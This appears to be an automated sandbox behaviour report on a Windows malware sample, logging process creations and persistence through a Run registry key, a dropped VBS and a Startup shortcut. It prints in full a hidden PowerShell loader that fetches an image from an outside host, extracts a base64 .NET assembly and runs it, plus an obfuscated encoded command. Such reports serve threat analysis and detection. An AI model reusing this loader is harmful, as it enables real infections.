Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDg	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))} }"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Code function: 3_2_00007FFD9B7600BD pushad ; iretd

3_2_00007FFD9B7600C1

Persistence and Installation Behavior

Command shell drops VBS files

Source: C:\Windows\System32\cmd.exe

File created: C:\ProgramData\escudellar.vbs

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\RegAsm.exe

Jump to dropped file

Boot Survival

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\escudellar.vbs

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk

Potential evasive JS / VBS script found (domain check)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Path			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
